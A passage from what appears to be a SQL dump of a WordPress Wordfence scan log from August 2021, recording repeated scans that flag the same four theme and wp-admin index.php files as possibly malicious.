indexed'),(2517,1628643638.950731,2,'info','1500 files indexed'),(2518,1628643639.132526,2,'info','2000 files indexed'),(2519,1628643639.324556,2,'info','2500 files indexed'),(2520,1628643639.443648,2,'info','3000 files indexed'),(2521,1628643639.611454,2,'info','3500 files indexed'),(2522,1628643640.208767,2,'info','4000 files indexed'),(2523,1628643640.508027,2,'info','4475 files indexed'),(2524,1628643648.475492,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(2525,1628643655.217758,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(2526,1628643659.173600,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(2527,1628643665.409910,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(2528,1628643669.610038,2,'info','Analyzed 500 files containing 8.07 MB of data so far'),(2529,1628643673.616338,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(2530,1628643677.621863,2,'info','Analyzed 700 files containing 11.05 MB of data so far'),(2531,1628643682.247800,2,'info','Analyzed 800 files containing 12.36 MB of data so far'),(2532,1628643687.331070,2,'info','Analyzed 900 files containing 13.31 MB of data so far'),(2533,1628643691.484988,2,'info','Analyzed 1000 files containing 15.06 MB of data so far'),(2534,1628643697.894830,2,'info','Analyzed 1100 files containing 20.48 MB of data so far'),(2535,1628643700.821163,2,'info','Analyzed 1200 files containing 22.09 MB of data so far'),(2536,1628643704.009361,2,'info','Analyzed 1300 files containing 23.26 MB of data so far'),(2537,1628643712.086966,2,'info','Analyzed 1400 files containing 24 MB of data so far'),(2538,1628643716.005778,2,'info','Analyzed 1500 files containing 24.95 MB of data so far'),(2539,1628643719.835214,2,'info','Analyzed 1600 files containing 24.98 MB of data so far'),(2540,1628643722.309541,2,'info','Analyzed 1700 files containing 25.02 MB of data so far'),(2541,1628643726.046924,2,'info','Analyzed 1800 files containing 26.21 MB of data so far'),(2542,1628643728.582905,2,'info','Analyzed 1900 files containing 26.64 MB of data so far'),(2543,1628643731.058577,2,'info','Analyzed 2000 files containing 27.12 MB of data so far'),(2544,1628643733.305384,2,'info','Analyzed 2100 files containing 27.38 MB of data so far'),(2545,1628643736.560120,2,'info','Analyzed 2200 files containing 30.33 MB of data so far'),(2546,1628643739.539348,2,'info','Analyzed 2300 files containing 34.59 MB of data so far'),(2547,1628643743.041620,2,'info','Analyzed 2400 files containing 37.16 MB of data so far'),(2548,1628643745.890700,2,'info','Analyzed 2500 files containing 37.95 MB of data so far'),(2549,1628643748.569673,2,'info','Analyzed 2600 files containing 40.05 MB of data so far'),(2550,1628643752.113588,2,'info','Analyzed 2700 files containing 41.66 MB of data so far'),(2551,1628643755.696299,2,'info','Analyzed 2800 files containing 43.31 MB of data so far'),(2552,1628643759.369089,2,'info','Analyzed 2900 files containing 46.73 MB of data so far'),(2553,1628643761.977376,2,'info','Analyzed 3000 files containing 47.75 MB of data so far'),(2554,1628643765.379160,2,'info','Analyzed 3100 files containing 49 MB of data so far'),(2555,1628643769.326153,2,'info','Analyzed 3200 files containing 49.83 MB of data so far'),(2556,1628643772.285914,2,'info','Analyzed 3300 files containing 53.26 MB of data so far'),(2557,1628643775.315943,2,'info','Analyzed 3400 files containing 53.97 MB of data so far'),(2558,1628643777.383038,2,'info','Analyzed 3500 files containing 55.57 MB of data so far'),(2559,1628643779.899787,2,'info','Analyzed 3600 files containing 58.56 MB of data so far'),(2560,1628643783.581027,2,'info','Analyzed 3700 files containing 60.45 MB of data so far'),(2561,1628643786.478254,2,'info','Analyzed 3800 files containing 62.06 MB of data so far'),(2562,1628643790.298900,2,'info','Analyzed 3900 files containing 72.76 MB of data so far'),(2563,1628643793.918047,2,'info','Analyzed 4000 files containing 76.31 MB of data so far'),(2564,1628643797.276437,2,'info','Analyzed 4100 files containing 78.55 MB of data so far'),(2565,1628643800.720448,2,'info','Analyzed 4200 files containing 81.44 MB of data so far'),(2566,1628643803.808075,2,'info','Analyzed 4300 files containing 84.4 MB of data so far'),(2567,1628643806.702478,2,'info','Analyzed 4400 files containing 85.43 MB of data so far'),(2568,1628643809.111584,2,'info','Analyzed 4475 files containing 86.87 MB of data.'),(2576,1628643810.852596,2,'info','Starting scan of file contents'),(2577,1628643811.876526,2,'info','Scanned contents of 23 additional files at 22.74 per second'),(2578,1628643812.907287,2,'info','Scanned contents of 76 additional files at 37.22 per second'),(2579,1628643813.913879,2,'info','Scanned contents of 118 additional files at 38.71 per second'),(2580,1628643814.914947,2,'info','Scanned contents of 139 additional files at 34.32 per second'),(2581,1628643815.932100,2,'info','Scanned contents of 182 additional files at 35.92 per second'),(2582,1628643816.413283,2,'info','Scanned contents of 192 additional files at 34.61 per second'),(2583,1628643816.415274,2,'info','Asking Wordfence to check URLs against malware list.'),(2584,1628643816.425747,2,'info','Checking 229 host keys against Wordfence scanning servers.'),(2585,1628643817.063459,2,'info','Done host key check.'),(2586,1628643817.895245,2,'info','Done file contents scan'),(2587,1628643817.906931,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php'),(2588,1628643817.912992,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php'),(2589,1628643817.918620,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php'),(2590,1628643817.923013,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/js/index.php'),(2596,1628643818.443225,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2597,1628643818.454159,2,'info','Checking 181 host keys against Wordfence scanning servers.'),(2598,1628643819.082973,2,'info','Done host key check.'),(2599,1628643819.157179,2,'info','Done examining URLs'),(2604,1628643819.549741,2,'info','Starting password strength check on 1 user.'),(2611,1628643823.064219,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2612,1628643823.074517,2,'info','Done examining URLs'),(2614,1628643823.306812,1,'info','-------------------'),(2615,1628643823.309211,2,'info','Wordfence used 15.04 MB of memory for scan. Server peak memory usage was: 33.04 MB'),(2616,1628643823.312029,1,'info','Scan Complete. Scanned 4475 files, 7 plugins, 11 themes, 26 posts, 0 comments and 317 URLs in 3 minutes 25 seconds.'),(2619,1628680408.758081,1,'info','Initiating quick scan'),(2624,1628680409.069328,1,'info','-------------------'),(2625,1628680409.091139,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2626,1628680409.101834,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2629,1628766945.194517,1,'info','Initiating quick scan'),(2634,1628766945.849642,1,'info','-------------------'),(2635,1628766945.891032,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2636,1628766945.911953,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2639,1628853319.408282,1,'info','Initiating quick scan'),(2644,1628853319.881434,1,'info','-------------------'),(2645,1628853319.905112,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2646,1628853319.916369,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2648,1628902852.227836,1,'info','Scheduled Wordfence scan starting at Saturday 14th of August 2021 01:00:52 AM'),(2650,1628902852.800599,1,'info','Contacting Wordfence to initiate scan'),(2657,1628902862.211116,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2658,1628902862.221348,2,'info','The disk has 3464499.48 MB available'),(2666,1628902862.441428,2,'info','Getting plugin list from WordPress'),(2667,1628902862.460875,2,'info','Found 6 plugins'),(2668,1628902862.464718,2,'info','Getting theme list from WordPress'),(2669,1628902862.507845,2,'info','Found 11 themes'),(2681,1628902864.927442,2,'info','500 files indexed'),(2682,1628902864.986609,2,'info','1000 files indexed'),(2683,1628902865.040189,2,'info','1500 files indexed'),(2684,1628902865.091820,2,'info','2000 files indexed'),(2685,1628902865.196076,2,'info','2500 files indexed'),(2686,1628902865.278784,2,'info','3000 files indexed'),(2687,1628902865.347096,2,'info','3500 files indexed'),(2688,1628902865.406195,2,'info','4000 files indexed'),(2689,1628902865.506714,2,'info','4475 files indexed'),(2690,1628902871.341740,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(2691,1628902874.775679,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(2692,1628902878.384307,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(2693,1628902883.678758,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(2694,1628902887.463210,2,'info','Analyzed 500 files containing 8.07 MB of data so far'),(2695,1628902891.233732,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(2696,1628902896.102144,2,'info','Analyzed 700 files containing 11.05 MB of data so far'),(2697,1628902900.375702,2,'info','Analyzed 800 files containing 12.36 MB of data so far'),(2698,1628902905.571214,2,'info','Analyzed 900 files containing 13.31 MB of data so far'),(2699,1628902908.279241,2,'info','Analyzed 1000 files containing 15.06 MB of data so far'),(2700,1628902911.773312,2,'info','Analyzed 1100 files containing 20.48 MB of data so far'),(2701,1628902915.354712,2,'info','Analyzed 1200 files containing 22.09 MB of data so far'),(2702,1628902920.325164,2,'info','Analyzed 1300 files containing 23.26 MB of data so far'),(2703,1628902923.696502,2,'info','Analyzed 1400 files containing 24 MB of data so far'),(2704,1628902926.722983,2,'info','Analyzed 1500 files containing 24.95 MB of data so far'),(2705,1628902930.650959,2,'info','Analyzed 1600 files containing 24.98 MB of data so far'),(2706,1628902933.386108,2,'info','Analyzed 1700 files containing 25.02 MB of data so far'),(2707,1628902937.544325,2,'info','Analyzed 1800 files containing 26.21 MB of data so far'),(2708,1628902940.831188,2,'info','Analyzed 1900 files containing 26.64 MB of data so far'),(2709,1628902944.146193,2,'info','Analyzed 2000 files containing 27.12 MB of data so far'),(2710,1628902947.324234,2,'info','Analyzed 2100 files containing 27.38 MB of data so far'),(2711,1628902951.156831,2,'info','Analyzed 2200 files containing 30.33 MB of data so far'),(2712,1628902955.140801,2,'info','Analyzed 2300 files containing 34.59 MB of data so far'),(2713,1628902958.657801,2,'info','Analyzed 2400 files containing 37.16 MB of data so far'),(2714,1628902961.823598,2,'info','Analyzed 2500 files containing 37.95 MB of data so far'),(2715,1628902965.545856,2,'info','Analyzed 2600 files containing 40.05 MB of data so far'),(2716,1628902969.573410,2,'info','Analyzed 2700 files containing 41.66 MB of data so far'),(2717,1628902972.442032,2,'info','Analyzed 2800 files containing 43.31 MB of data so far'),(2718,1628902976.235716,2,'info','Analyzed 2900 files containing 46.73 MB of data so far'),(2719,1628902978.492712,2,'info','Analyzed 3000 files containing 47.75 MB of data so far'),(2720,1628902982.625016,2,'info','Analyzed 3100 files containing 49 MB of data so far'),(2721,1628902986.267865,2,'info','Analyzed 3200 files containing 49.83 MB of data so far'),(2722,1628902992.607156,2,'info','Analyzed 3300 files containing 53.26 MB of data so far'),(2723,1628902994.643700,2,'info','Analyzed 3400 files containing 53.97 MB of data so far'),(2724,1628902996.956492,2,'info','Analyzed 3500 files containing 55.57 MB of data so far'),(2725,1628903000.763010,2,'info','Analyzed 3600 files containing 58.56 MB of data so far'),(2726,1628903003.495922,2,'info','Analyzed 3700 files containing 60.45 MB of data so far'),(2727,1628903005.743539,2,'info','Analyzed 3800 files containing 62.06 MB of data so far'),(2728,1628903011.097026,2,'info','Analyzed 3900 files containing 72.76 MB of data so far'),(2729,1628903015.061444,2,'info','Analyzed 4000 files containing 76.3 MB of data so far'),(2730,1628903018.032411,2,'info','Analyzed 4100 files containing 78.55 MB of data so far'),(2731,1628903021.684595,2,'info','Analyzed 4200 files containing 81.44 MB of data so far'),(2732,1628903025.255714,2,'info','Analyzed 4300 files containing 84.39 MB of data so far'),(2733,1628903027.874121,2,'info','Analyzed 4400 files containing 85.43 MB of data so far'),(2734,1628903031.402265,2,'info','Analyzed 4475 files containing 86.87 MB of data.'),(2742,1628903033.140341,2,'info','Starting scan of file contents'),(2743,1628903034.175513,2,'info','Scanned contents of 60 additional files at 59.17 per second'),(2744,1628903035.184029,2,'info','Scanned contents of 104 additional files at 51.42 per second'),(2745,1628903036.198679,2,'info','Scanned contents of 151 additional files at 49.72 per second'),(2746,1628903037.089723,2,'info','Scanned contents of 192 additional files at 48.88 per second'),(2747,1628903037.099838,2,'info','Asking Wordfence to check URLs against malware list.'),(2748,1628903037.102167,2,'info','Checking 229 host keys against Wordfence scanning servers.'),(2749,1628903037.702497,2,'info','Done host key check.'),(2750,1628903038.400945,2,'info','Done file contents scan'),(2751,1628903038.428199,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php'),(2752,1628903038.439329,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php'),(2753,1628903038.443478,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php'),(2754,1628903038.447427,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/js/index.php'),(2760,1628903038.594362,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2761,1628903038.596843,2,'info','Checking 181 host keys against Wordfence scanning servers.'),(2762,1628903039.217985,2,'info','Done host key check.'),(2763,1628903039.222096,2,'info','Done examining URLs'),(2768,1628903039.840214,2,'info','Starting password strength check on 1 user.'),(2775,1628903043.490446,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2776,1628903043.492582,2,'info','Done examining URLs'),(2778,1628903043.669471,1,'info','-------------------'),(2779,1628903043.673439,2,'info','Wordfence used 12 MB of memory for scan. Server peak memory usage was: 30 MB'),(2780,1628903043.675483,1,'info','Scan Complete. Scanned 4475 files, 7 plugins, 11 themes, 26 posts, 0 comments and 317 URLs in 3 minutes 10 seconds.'),(2783,1628941200.244243,1,'info','Initiating quick scan'),(2788,1628941200.654183,1,'info','-------------------'),(2789,1628941200.675693,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2790,1628941200.686710,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2793,1629026346.455252,1,'info','Initiating quick scan'),(2798,1629026346.800535,1,'info','-------------------'),(2799,1629026346.824366,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2800,1629026346.835923,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2803,1629112573.168566,1,'info','Initiating quick scan'),(2808,1629112573.534610,1,'info','-------------------'),(2809,1629112573.556308,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2810,1629112573.567553,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2812,1629162250.050700,1,'info','Scheduled Wordfence scan starting at Tuesday 17th of August 2021 01:04:10 AM'),(2814,1629162250.691974,1,'info','Contacting Wordfence to initiate scan'),(2821,1629162257.989886,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2822,1629162258.000644,2,'info','The disk has 3464673.35 MB available'),(2830,1629162258.533009,2,'info','Getting plugin list from WordPress'),(2831,1629162258.541016,2,'info','Found 6 plugins'),(2832,1629162258.542795,2,'info','Getting theme list from WordPress'),(2833,1629162258.569783,2,'info','Found 11 themes'),(2845,1629162260.460272,2,'info','500 files indexed'),(2846,1629162260.574144,2,'info','1000 files indexed'),(2847,1629162260.634001,2,'info','1500 files indexed'),(2848,1629162260.676086,2,'info','2000 files indexed'),(2849,1629162260.748193,2,'info','2500 files indexed'),(2850,1629162260.799091,2,'info','3000 files indexed'),(2851,1629162260.917413,2,'info','3500 files indexed'),(2852,1629162260.997426,2,'info','4000 files indexed'),(2853,1629162261.064765,2,'info','4475 files indexed'),(2854,1629162266.042774,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(2855,1629162269.858659,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(2856,1629162275.009984,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(2857,1629162278.909368,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(2858,1629162284.122179,2,'info','Analyzed 500 files containing 8.07 MB of data so far'),(2859,1629162288.767612,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(2860,1629162292.035764,2,'info','Analyzed 700 files containing 11.05 MB of data so far'),(2861,1629162297.369858,2,'info','Analyzed 800 files containing 12.36 MB of data so far'),(2862,1629162303.341674,2,'info','Analyzed 900 files containing 13.31 MB of data so far'),(2863,1629162309.355834,2,'info','Analyzed 1000 files containing 15.06 MB of data so far'),(2864,1629162312.834838,2,'info','Analyzed 1100 files containing 20.48 MB of data so far'),(2865,1629162318.817619,2,'info','Analyzed 1200 files containing 22.09 MB of data so far'),(2866,1629162323.168112,2,'info','Analyzed 1300 files containing 23.26 MB of data so far'),(2867,1629162326.388525,2,'info','Analyzed 1400 files containing 24 MB of data so far'),(2868,1629162330.143706,2,'info','Analyzed 1500 files containing 24.95 MB of data so far'),(2869,1629162334.240785,2,'info','Analyzed 1600 files containing 24.98 MB of data so far'),(2870,1629162336.503466,2,'info','Analyzed 1700 files containing 25.02 MB of data so far'),(2871,1629162340.128528,2,'info','Analyzed 1800 files containing 26.21 MB of data so far'),(2872,1629162342.978733,2,'info','Analyzed 1900 files containing 26.64 MB of data so far'),(2873,1629162347.251695,2,'info','Analyzed 2000 files containing 27.12 MB of data so far'),(2874,1629162351.266360,2,'info','Analyzed 2100 files containing 27.38 MB of data so far'),(2875,1629162354.710726,2,'info','Analyzed 2200 files containing 30.33 MB of data so far'),(2876,1629162358.133990,2,'info','Analyzed 2300 files containing 34.59 MB of data so far'),(2877,1629162361.984354,2,'info','Analyzed 2400 files containing 37.16 MB of data so far'),(2878,1629162365.314987,2,'info','Analyzed 2500 files containing 37.95 MB of data so far'),(2879,1629162368.774172,2,'info','Analyzed 2600 files containing 40.05 MB of data so far'),(2880,1629162373.021849,2,'info','Analyzed 2700 files containing 41.66 MB of data so far'),(2881,1629162376.086968,2,'info','Analyzed 2800 files containing 43.31 MB of data so far'),(2882,1629162381.126068,2,'info','Analyzed 2900 files containing 46.73 MB of data so far'),(2883,1629162384.612884,2,'info','Analyzed 3000 files containing 47.75 MB of data so far'),(2884,1629162387.977111,2,'info','Analyzed 3100 files containing 49 MB of data so far'),(2885,1629162391.848962,2,'info','Analyzed 3200 files containing 49.83 MB of data so far'),(2886,1629162394.840098,2,'info','Analyzed 3300 files containing 53.27 MB of data so far'),(2887,1629162398.398989,2,'info','Analyzed 3400 files containing 53.98 MB of data so far'),(2888,1629162401.456439,2,'info','Analyzed 3500 files containing 55.58 MB of data so far'),(2889,1629162404.657919,2,'info','Analyzed 3600 files containing 58.57 MB of data so far'),(2890,1629162407.918979,2,'info','Analyzed 3700 files containing 60.46 MB of data so far'),(2891,1629162411.321126,2,'info','Analyzed 3800 files containing 62.07 MB of data so far'),(2892,1629162415.752362,2,'info','Analyzed 3900 files containing 72.78 MB of data so far'),(2893,1629162419.070103,2,'info','Analyzed 4000 files containing 76.32 MB of data so far'),(2894,1629162421.726315,2,'info','Analyzed 4100 files containing 78.56 MB of data so far'),(2895,1629162424.769976,2,'info','Analyzed 4200 files containing 81.45 MB of data so far'),(2896,1629162427.503404,2,'info','Analyzed 4300 files containing 84.41 MB of data so far'),(2897,1629162431.964975,2,'info','Analyzed 4400 files containing 85.45 MB of data so far'),(2898,1629162434.091767,2,'info','Analyzed 4475 files containing 86.88 MB of data.'),(2906,1629162435.887846,2,'info','Starting scan of file contents'),(2907,1629162436.937802,2,'info','Scanned contents of 34 additional files at 33.75 per second'),(2908,1629162437.955441,2,'info','Scanned contents of 83 additional files at 40.99 per second'),(2909,1629162438.957617,2,'info','Scanned contents of 117 additional files at 38.65 per second'),(2910,1629162439.959824,2,'info','Scanned contents of 163 additional files at 40.45 per second'),(2911,1629162440.680882,2,'info','Scanned contents of 192 additional files at 40.42 per second'),(2912,1629162440.691130,2,'info','Asking Wordfence to check URLs against malware list.'),(2913,1629162440.701945,2,'info','Checking 229 host keys against Wordfence scanning servers.'),(2914,1629162441.319772,2,'info','Done host key check.'),(2915,1629162442.125146,2,'info','Done file contents scan'),(2916,1629162442.127864,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php'),(2917,1629162442.132816,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php'),(2918,1629162442.149201,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php'),(2919,1629162442.156413,2,'info','Adding issue: File appears to be malicious or unsafe: wp-admin/js/index.php'),(2925,1629162442.327018,2,'info','Examining URLs found in posts we scanned for dangerous websites'),(2926,1629162442.329162,2,'info','Checking 181 host keys against Wordfence scanning servers.'),(2927,1629162442.932415,2,'info','Done host key check.'),(2928,1629162442.964056,2,'info','Done examining URLs'),(2933,1629162443.564649,2,'info','Starting password strength check on 1 user.'),(2940,1629162447.203308,2,'info','Examining URLs found in the options we scanned for dangerous websites'),(2941,1629162447.205645,2,'info','Done examining URLs'),(2943,1629162447.298092,1,'info','-------------------'),(2944,1629162447.309809,2,'info','Wordfence used 12 MB of memory for scan. Server peak memory usage was: 30 MB'),(2945,1629162447.312387,1,'info','Scan Complete. Scanned 4475 files, 7 plugins, 11 themes, 26 posts, 0 comments and 317 URLs in 3 minutes 16 seconds.'),(2948,1629199223.815873,1,'info','Initiating quick scan'),(2953,1629199223.994463,1,'info','-------------------'),(2954,1629199223.998759,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2955,1629199224.000791,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2958,1629285308.455944,1,'info','Initiating quick scan'),(2963,1629285309.223440,1,'info','-------------------'),(2964,1629285309.285965,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 20 MB'),(2965,1629285309.310302,1,'info','Quick Scan Complete. Scanned in 1 second.'),(2968,1629372083.241128,1,'info','Initiating quick scan'),(2973,1629372083.544065,1,'info','-------------------'),(2974,1629372083.565192,2,'info','Wordfence used 0 B of memory for scan. Server peak memory usage was: 18 MB'),(2975,1629372083.575896,1,'info','Quick Scan Complete. Scanned in less than 1 second.'),(2977,1629421827.851252,1,'info','Scheduled Wordfence scan starting at Friday 20th of August 2021 01:10:27 AM'),(2979,1629421828.861595,1,'info','Contacting Wordfence to initiate scan'),(2986,1629421836.227383,2,'info','Total disk space: 3.58 TB -- Free disk space: 3.3 TB'),(2987,1629421836.245146,2,'info','The disk has 3464015.62 MB available'),(2995,1629421836.467073,2,'info','Getting plugin list from WordPress'),(2996,1629421836.485227,2,'info','Found 6 plugins'),(2997,1629421836.495322,2,'info','Getting theme list from WordPress'),(2998,1629421836.533206,2,'info','Found 11 themes'),(3001,1629421838.535766,10,'info','SUM_START:Fetching list of known malware files from Wordfence'),(3002,1629421838.548199,10,'info','SUM_ENDSUCCESS:Fetching list of known malware files from Wordfence'),(3003,1629421838.587955,10,'info','SUM_START:Fetching list of known core files from Wordfence'),(3004,1629421838.600103,10,'info','SUM_ENDSUCCESS:Fetching list of known core files from Wordfence'),(3005,1629421838.680199,10,'info','SUM_START:Comparing core WordPress files against originals in repository'),(3006,1629421838.724400,10,'info','SUM_DISABLED:Skipping theme scan'),(3007,1629421838.752343,10,'info','SUM_DISABLED:Skipping plugin scan'),(3008,1629421838.765081,10,'info','SUM_START:Scanning for known malware files'),(3009,1629421838.797743,10,'info','SUM_START:Scanning for unknown files in wp-admin and wp-includes'),(3010,1629421838.865752,2,'info','500 files indexed'),(3011,1629421838.941942,2,'info','1000 files indexed'),(3012,1629421839.193689,2,'info','1500 files indexed'),(3013,1629421839.319418,2,'info','2000 files indexed'),(3014,1629421839.542248,2,'info','2500 files indexed'),(3015,1629421839.644660,2,'info','3000 files indexed'),(3016,1629421839.751238,2,'info','3500 files indexed'),(3017,1629421839.855462,2,'info','4000 files indexed'),(3018,1629421839.927245,2,'info','4475 files indexed'),(3019,1629421844.739409,2,'info','Analyzed 100 files containing 1.65 MB of data so far'),(3020,1629421850.056104,2,'info','Analyzed 200 files containing 3.22 MB of data so far'),(3021,1629421855.109204,2,'info','Analyzed 300 files containing 4.52 MB of data so far'),(3022,1629421859.147128,2,'info','Analyzed 400 files containing 7.21 MB of data so far'),(3023,1629421863.635154,2,'info','Analyzed 500 files containing 8.07 MB of data so far'),(3024,1629421868.415961,2,'info','Analyzed 600 files containing 8.93 MB of data so far'),(3025,1629421875.025904,2,'info','Analyzed 700 files containing 11.05 MB of data so far'),(3026,1629421879.908840,2,'info','Analyzed 800 files containing 12.36 MB of data so far'),(3027,1629421883.706162,2,'info','Analyzed 900 files containing 13.31 MB of data so far'),(3028,1629421890.102258,2,'info','Analyzed 1000 files containing 15.06 MB of data so far'),(3029,1629421895.594129,2,'info','Analyzed 1100 files containing 20.48 MB of data so far'),(3030,1629421899.772880,2,'info','Analyzed 1200 files containing 22.09 MB of data so far'),(3031,1629421903.394717,2,'info','Analyzed 1300 files containing 23.26 MB of data so far'),(3032,1629421907.577081,2,'info','Analyzed 1400 files containing 24 MB of data so far'),(3033,1629421912.106757,2,'info','Analyzed 1500 files containing 24.95 MB of data so far'),(3034,1629421918.121109,2,'info','Analyzed 1600 files containing 24.98 MB of data so far'),(3035,1629421923.006491,2,'info','Analyzed 1700 files containing 25.02 MB of data so far'),(3036,1629421931.415247,2,'info','Analyzed 1800 files containing 26.21 MB of data so far'),(3037,1629421935.148241,2,'info','Analyzed 1900 files containing 26.64 MB of data so far'),(3038,1629421938.656773,2,'info','Analyzed 2000 files containing 27.12 MB of data so far'),(3039,1629421941.694322,2,'info','Analyzed 2100 files containing 27.38 MB of data so far'),(3040,1629421946.395827,2,'info','Analyzed 2200 files containing 30.33 MB of data so far'),(3041,1629421952.648417,2,'info','Analyzed 2300 files containing 34.59 MB of data so far'),(3042,1629421959.088857,2,'info','Analyzed 2400 files containing 37.16 MB of data so far'),(3043,1629421963.991122,2,'info','Analyzed 2500 files containing 37.95 MB of data so far'),(3044,1629421969.652017,2,'info','Analyzed 2600 files containing 40.05 MB of data so far'),(3045,1629421975.268282,2,'info','Analyzed 2700 files containing 41.66 MB of data so far'),(3046,1629421980.103214,2,'info','Analyzed 2800 files containing 43.31 MB of data so far'),(3047,1629421984.021491,2,'info','Analyzed 2900 files containing 46.73 MB of data so far'),(3048,1629421988.530045,2,'info','Analyzed 3000 files containing 47.75 MB of data so far'),(3049,1629421994.037434,2,'info','Analyzed 3100 files containing 49 MB of data so far'),(3050,1629421998.861350,2,'info','Analyzed 3200 files containing 49.83 MB of data so far'),(3051,1629422003.405751,2,'info','Analyzed 3300 files containing 53.27 MB of data so far'),(3052,1629422008.942889,2,'info','Analyzed 3400 files containing 53.98 MB of data so far'),(3053,1629422012.083476,2,'info','Analyzed 3500 files containing 55.58 MB of data so far'),(3054,1629422015.848837,2,'info','Analyzed 3600 files containing 58.57 MB of data so far'),(3055,1629422019.505260,2,'info','Analyzed 3700 files containing 60.46 MB of data so far'),(3056,1629422025.792027,2,'info','Analyzed 3800 files containing 62.07 MB of data so far'),(3057,1629422030.075801,2,'info','Analyzed 3900 files containing 72.78 MB of data so far'),(3058,1629422034.374560,2,'info','Analyzed 4000 files containing 76.32 MB of data so far'),(3059,1629422040.632570,2,'info','Analyzed 4100 files containing 78.56 MB of data so far'),(3060,1629422045.163017,2,'info','Analyzed 4200 files containing 81.45 MB of data so far'),(3061,1629422049.156734,2,'info','Analyzed 4300 files containing 84.41 MB of data so far'),(3062,1629422052.657734,2,'info','Analyzed 4400 files containing 85.45 MB of data so far'),(3063,1629422056.546364,2,'info','Analyzed 4475 files containing 86.88 MB of data.'),(3064,1629422056.565549,10,'info','SUM_ENDOK:Comparing core WordPress files against originals in repository'),(3065,1629422056.601347,10,'info','SUM_ENDBAD:Scanning for unknown files in wp-admin and wp-includes'),(3066,1629422056.634843,10,'info','SUM_ENDOK:Scanning for known malware files'),(3067,1629422056.655503,10,'info','SUM_START:Check for publicly accessible configuration files, backup files and logs'),(3068,1629422056.672618,10,'info','SUM_ENDOK:Check for publicly accessible configuration files, backup files and logs'),(3069,1629422056.754352,10,'info','SUM_START:Scanning file contents for infections and vulnerabilities'),(3070,1629422056.809321,10,'info','SUM_START:Scanning file contents for URLs on a domain blocklist'),(3071,1629422058.470950,2,'info','Starting scan of file contents'),(3072,1629422059.613675,2,'info','Scanned contents of 18 additional files at 16.19 per second'),(3073,1629422060.637703,2,'info','Scanned contents of 49 additional files at 22.94 per second'),(3074,1629422061.648386,2,'info','Scanned contents of 80 additional files at 25.43 per second'),(3075,1629422062.665530,2,'info','Scanned contents of 106 additional files at 25.46 per second'),(3076,1629422063.690071,2,'info','Scanned contents of 128 additional files at 24.67 per second'),(3077,1629422064.691634,2,'info','Scanned contents of 137 additional files at 22.13 per second'),(3078,1629422065.695631,2,'info','Scanned contents of 159 additional files at 22.10 per second'),(3079,1629422066.699612,2,'info','Scanned contents of 180 additional files at 21.96 per second'),(3080,1629422067.078371,2,'info','Scanned contents of 192 additional files at 22.39 per second'),(3081,1629422067.080266,2,'info','Asking Wordfence to check URLs against malware list.'),(3082,1629422067.082510,2,'info','Checking 229 host keys against Wordfence scanning servers.'),(3083,1629422067.679994,2,'info','Done host key check.'),(3084,1629422068.472287,2,'info','Done file contents scan'),(3085,1629422068.483263,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/part_footer/part_footer/index.php'),(3086,1629422068.505334,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_attachment/loop_attachment/index.php'),(3087,1629422068.526604,2,'info','Adding issue: File appears to be malicious or unsafe: wp-content/themes/doctors/core/contents/loop_author/loop_author/index.php'),(3088,1629422068.548319,2,'info','Adding issue: File appears to be malicious or unsafe: 